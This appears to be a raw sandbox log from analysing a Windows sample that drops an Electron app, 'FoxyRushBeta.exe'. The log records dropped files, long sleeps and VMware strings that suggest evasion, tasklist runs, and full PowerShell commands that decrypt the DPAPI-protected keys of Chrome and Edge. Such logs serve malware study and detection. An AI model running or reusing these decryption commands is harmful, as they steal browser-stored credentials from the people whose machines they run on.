Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3626Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2536Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2644Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1630Jump to behavior
Source: C:\Users\user\Desktop\bkHLzNaNMS.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsdDF38.tmp\7z-out\d3dcompiler_47.dllJump to dropped file
Source: C:\Users\user\Desktop\bkHLzNaNMS.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsdDF38.tmp\7z-out\resources\elevate.exeJump to dropped file
Source: C:\Users\user\Desktop\bkHLzNaNMS.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsdDF38.tmp\7z-out\resources\app.asar.unpacked\node_modules\@primno\dpapi\prebuilds\win32-x64\node.napi.nodeJump to dropped file
Source: C:\Users\user\Desktop\bkHLzNaNMS.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsdDF38.tmp\7z-out\vk_swiftshader.dllJump to dropped file
Source: C:\Users\user\Desktop\bkHLzNaNMS.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsdDF38.tmp\7z-out\libEGL.dllJump to dropped file
Source: C:\Users\user\Desktop\bkHLzNaNMS.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsdDF38.tmp\nsis7z.dllJump to dropped file
Source: C:\Users\user\Desktop\bkHLzNaNMS.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsdDF38.tmp\7z-out\resources\app.asar.unpacked\node_modules\sqlite3\build\Release\node_sqlite3.nodeJump to dropped file
Source: C:\Users\user\Desktop\bkHLzNaNMS.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsdDF38.tmp\7z-out\libGLESv2.dllJump to dropped file
Source: C:\Users\user\Desktop\bkHLzNaNMS.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsdDF38.tmp\System.dllJump to dropped file
Source: C:\Users\user\Desktop\bkHLzNaNMS.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsdDF38.tmp\7z-out\vulkan-1.dllJump to dropped file
Source: C:\Users\user\Desktop\bkHLzNaNMS.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\d3dcompiler_47.dllJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5996Thread sleep count: 3626 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3168Thread sleep count: 2536 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1488Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 356Thread sleep time: -1844674407370954s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5452Thread sleep count: 2644 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3876Thread sleep count: 1630 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5368Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2940Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\d0010809Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\d0010809Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\d0010809Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\d0010809Jump to behavior
Source: C:\Users\user\Desktop\bkHLzNaNMS.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeFile Volume queried: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q FullSizeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeFile Volume queried: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q FullSizeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeFile Volume queried: C:\Users\user\AppData\Local\Temp FullSizeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeFile Volume queried: C:\Users\user\AppData\Local\Temp FullSizeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\user\Desktop\bkHLzNaNMS.exeFile opened: C:\Users\user\AppData\Local\Temp\nsdDF38.tmp\7z-out\resources\app.asar.unpacked\node_modules\@primnoJump to behavior
Source: C:\Users\user\Desktop\bkHLzNaNMS.exeFile opened: C:\Users\user\AppData\Local\Temp\nsdDF38.tmp\7z-out\resources\app.asar.unpacked\node_modules\@primno\dpapiJump to behavior
Source: C:\Users\user\Desktop\bkHLzNaNMS.exeFile opened: C:\Users\user\AppData\Local\Temp\nsdDF38.tmp\7z-out\resources\app.asar.unpacked\node_modulesJump to behavior
Source: C:\Users\user\Desktop\bkHLzNaNMS.exeFile opened: C:\Users\user\AppData\Local\Temp\nsdDF38.tmp\7z-out\resources\app.asar.unpackedJump to behavior
Source: C:\Users\user\Desktop\bkHLzNaNMS.exeFile opened: C:\Users\user\AppData\Local\Temp\nsdDF38.tmp\7z-out\resourcesJump to behavior
Source: C:\Users\user\Desktop\bkHLzNaNMS.exeFile opened: C:\Users\user\AppData\Local\Temp\nsdDF38.tmp\7z-out\localesJump to behavior
Source: libGLESv2.dll.0.drBinary or memory string: VMware
Source: bkHLzNaNMS.exe, 00000000.00000003.2191600867.0000000000869000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:22
Source: bkHLzNaNMS.exe, 00000000.00000003.2191223251.0000000000869000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: bkHLzNaNMS.exe, 00000000.00000003.2191284442.0000000000869000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
Source: bkHLzNaNMS.exe, 00000000.00000003.2191223251.0000000000869000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: libGLESv2.dll.0.drBinary or memory string: ZAMDARMAppleBroadcomGoogleIntelMesaMicrosoftNVIDIAImagination TechnologiesQualcommSamsung Electronics Co., Ltd.VivanteVMwareVirtIOTest
Source: bkHLzNaNMS.exe, 00000000.00000003.2191284442.0000000000869000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\tasklist.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\tasklist.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeProcess created: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe "C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\FoxyRushBeta" --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1908,i,1504465930611205923,3791245271316318440,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=1900 /prefetch:2Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,133,249,150,31,215,133,122,74,160,83,200,231,85,194,93,57,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,220,99,52,70,203,13,214,237,172,78,180,7,135,132,222,56,192,222,60,122,2,71,120,79,2,110,200,30,117,75,45,64,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,84,96,129,36,148,225,154,120,74,75,125,156,249,147,149,248,25,11,154,223,250,69,31,112,70,8,1,93,107,120,136,224,48,0,0,0,6,45,27,130,158,227,72,112,46,16,20,247,121,185,158,95,106,75,104,237,172,49,168,214,157,137,66,208,86,220,45,252,169,85,86,184,103,83,137,130,133,35,244,129,44,127,163,72,64,0,0,0,35,18,109,136,80,52,198,238,200,236,226,120,27,146,160,174,71,84,66,203,39,169,215,160,227,44,242,154,161,64,187,142,165,157,66,1,229,116,228,177,236,99,223,240,230,79,21,58,53,251,1,129,235,77,36,48,152,174,95,142,72,93,217,72), $null, 'CurrentUser')"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeProcess created: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe "C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\FoxyRushBeta" --field-trial-handle=2528,i,1504465930611205923,3791245271316318440,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=2524 /prefetch:3Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,133,249,150,31,215,133,122,74,160,83,200,231,85,194,93,57,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,14,53,24,103,59,147,206,28,42,108,2,171,66,248,59,252,178,162,35,232,127,115,109,155,94,76,82,107,203,163,4,197,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,102,39,139,236,68,70,39,152,67,111,123,34,177,197,103,181,124,213,190,112,13,193,185,90,191,194,52,69,126,126,90,70,48,0,0,0,78,43,108,139,184,233,18,30,79,160,62,90,54,145,175,184,1,206,218,146,139,219,218,40,3,209,83,56,71,210,79,189,120,174,46,157,101,81,201,76,77,181,151,119,46,253,183,146,64,0,0,0,25,132,83,220,77,72,234,147,112,233,192,145,190,240,42,192,38,154,220,71,203,164,145,111,115,55,19,193,38,168,21,189,120,226,128,178,203,174,136,16,121,184,133,15,28,247,227,66,0,254,38,112,15,247,17,81,12,63,142,85,32,243,79,251), $null, 'CurrentUser')"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeProcess created: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe "C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --user-data-dir="C:\Users\user\AppData\Roaming\FoxyRushBeta" --field-trial-handle=2524,i,1504465930611205923,3791245271316318440,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=2520 /prefetch:3Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeProcess created: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe "C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=32902 --gpu-device-id=32069 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --user-data-dir="C:\Users\user\AppData\Roaming\FoxyRushBeta" --gpu-preferences=UAAAAAAAAADoAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAABCAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2644,i,1504465930611205923,3791245271316318440,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=1296 /prefetch:8Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklistJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,133,249,150,31,215,133,122,74,160,83,200,231,85,194,93,57,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,220,99,52,70,203,13,214,237,172,78,180,7,135,132,222,56,192,222,60,122,2,71,120,79,2,110,200,30,117,75,45,64,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,84,96,129,36,148,225,154,120,74,75,125,156,249,147,149,248,25,11,154,223,250,69,31,112,70,8,1,93,107,120,136,224,48,0,0,0,6,45,27,130,158,227,72,112,46,16,20,247,121,185,158,95,106,75,104,237,172,49,168,214,157,137,66,208,86,220,45,252,169,85,86,184,103,83,137,130,133,35,244,129,44,127,163,72,64,0,0,0,35,18,109,136,80,52,198,238,200,236,226,120,27,146,160,174,71,84,66,203,39,169,215,160,227,44,242,154,161,64,187,142,165,157,66,1,229,116,228,177,236,99,223,240,230,79,21,58,53,251,1,129,235,77,36,48,152,174,95,142,72,93,217,72), $null, 'CurrentUser')Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,133,249,150,31,215,133,122,74,160,83,200,231,85,194,93,57,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,14,53,24,103,59,147,206,28,42,108,2,171,66,248,59,252,178,162,35,232,127,115,109,155,94,76,82,107,203,163,4,197,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,102,39,139,236,68,70,39,152,67,111,123,34,177,197,103,181,124,213,190,112,13,193,185,90,191,194,52,69,126,126,90,70,48,0,0,0,78,43,108,139,184,233,18,30,79,160,62,90,54,145,175,184,1,206,218,146,139,219,218,40,3,209,83,56,71,210,79,189,120,174,46,157,101,81,201,76,77,181,151,119,46,253,183,146,64,0,0,0,25,132,83,220,77,72,234,147,112,233,192,145,190,240,42,192,38,154,220,71,203,164,145,111,115,55,19,193,38,168,21,189,120,226,128,178,203,174,136,16,121,184,133,15,28,247,227,66,0,254,38,112,15,247,17,81,12,63,142,85,32,243,79,251), $null, 'CurrentUser')Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeProcess created: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe "c:\users\user\appdata\local\temp\2txrqpqyxmap3e00ppro83zjr7q\foxyrushbeta.exe" --type=gpu-process --user-data-dir="c:\users\user\appdata\roaming\foxyrushbeta" --gpu-preferences=uaaaaaaaaadgaaaeaaaaaaaaaaaaaaaaaabgaaeaaaaaaaaaaaaaaaaaaaacaaaaaaaaaaaaaaaaaaaaaaaaabaaaaaaaaaaeaaaaaaaaaaiaaaaaaaaaagaaaaaaaaa --field-trial-handle=1908,i,1504465930611205923,3791245271316318440,262144 --disable-features=sparerendererforsiteperprocess,windelayspellcheckserviceinit,winretrievesuggestionsonlyondemand --variations-seed-version --mojo-platform-channel-handle=1900 /prefetch:2
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /d /s /c "powershell.exe add-type -assemblyname system.security; [system.security.cryptography.protecteddata]::unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,133,249,150,31,215,133,122,74,160,83,200,231,85,194,93,57,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,220,99,52,70,203,13,214,237,172,78,180,7,135,132,222,56,192,222,60,122,2,71,120,79,2,110,200,30,117,75,45,64,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,84,96,129,36,148,225,154,120,74,75,125,156,249,147,149,248,25,11,154,223,250,69,31,112,70,8,1,93,107,120,136,224,48,0,0,0,6,45,27,130,158,227,72,112,46,16,20,247,121,185,158,95,106,75,104,237,172,49,168,214,157,137,66,208,86,220,45,252,169,85,86,184,103,83,137,130,133,35,244,129,44,127,163,72,64,0,0,0,35,18,109,136,80,52,198,238,200,236,226,120,27,146,160,174,71,84,66,203,39,169,215,160,227,44,242,154,161,64,187,142,165,157,66,1,229,116,228,177,236,99,223,240,230,79,21,58,53,251,1,129,235,77,36,48,152,174,95,142,72,93,217,72), $null, 'currentuser')"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-type -assemblyname system.security; [system.security.cryptography.protecteddata]::unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,133,249,150,31,215,133,122,74,160,83,200,231,85,194,93,57,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,220,99,52,70,203,13,214,237,172,78,180,7,135,132,222,56,192,222,60,122,2,71,120,79,2,110,200,30,117,75,45,64,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,84,96,129,36,148,225,154,120,74,75,125,156,249,147,149,248,25,11,154,223,250,69,31,112,70,8,1,93,107,120,136,224,48,0,0,0,6,45,27,130,158,227,72,112,46,16,20,247,121,185,158,95,106,75,104,237,172,49,168,214,157,137,66,208,86,220,45,252,169,85,86,184,103,83,137,130,133,35,244,129,44,127,163,72,64,0,0,0,35,18,109,136,80,52,198,238,200,236,226,120,27,146,160,174,71,84,66,203,39,169,215,160,227,44,242,154,161,64,187,142,165,157,66,1,229,116,228,177,236,99,223,240,230,79,21,58,53,251,1,129,235,77,36,48,152,174,95,142,72,93,217,72), $null, 'currentuser')
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeProcess created: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe "c:\users\user\appdata\local\temp\2txrqpqyxmap3e00ppro83zjr7q\foxyrushbeta.exe" --type=utility --utility-sub-type=network.mojom.networkservice --lang=en-gb --service-sandbox-type=none --user-data-dir="c:\users\user\appdata\roaming\foxyrushbeta" --field-trial-handle=2528,i,1504465930611205923,3791245271316318440,262144 --disable-features=sparerendererforsiteperprocess,windelayspellcheckserviceinit,winretrievesuggestionsonlyondemand --variations-seed-version --mojo-platform-channel-handle=2524 /prefetch:3
